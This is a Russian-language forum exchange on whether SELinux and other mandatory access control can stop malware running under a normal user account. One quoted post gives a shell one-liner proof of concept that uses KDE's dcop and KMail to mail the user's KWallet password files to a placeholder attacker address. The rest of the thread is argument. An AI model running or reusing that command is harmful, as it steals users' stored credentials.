>[оверквотинг удален]
>>>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>>>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>>>Postfix, если процесс работает не под рутом.
>>
>>PoC 1:
>>
>>#!/bin/sh
>>dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"
>
>1. dcop уже в прошлом, как им пользовались, уже не помню :) А что непонятно? :)
>2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а,
>значит, будет пресечено SELinux
То есть SELinux запретит пользователю создавать резервную копию базы своих паролей?
>>PoC 2:
>
>Вырубится SELinux еще на попытке записать в /tmp
Вы что, серьёзно предлагаете запретить программам писать в /tmp?! К тому же, что помешает писать в этом случае, скажем, в хомяк? Простите, но, кажется, вы ещё не выпили свой кофе.
>>Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером.
>>Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на
>>худой конец); б) возможность что-то выполнять от имени вроде как аутентичного
>>пользователя. А контейнеры сами по себе тоже не панацея сколько
>>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>>в системах виртуализации?..
>
>опять же, MAC решает :)
И как именно он решает проблемы, о которых сам админ явно не в курсе? Это не говоря о том, что предусмотреть ВСЁ в MAC практически нереально, только на простых конфигурациях - но там он уже просто излишний.
>>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>>скоро (в течение пары лет) исправится. ;)
>
>Зачем? Если так удобно клепать ботнеты на Windows?
О том и речь, что их станет удобно клепать для MacOS X/Linux/нужное вписать?
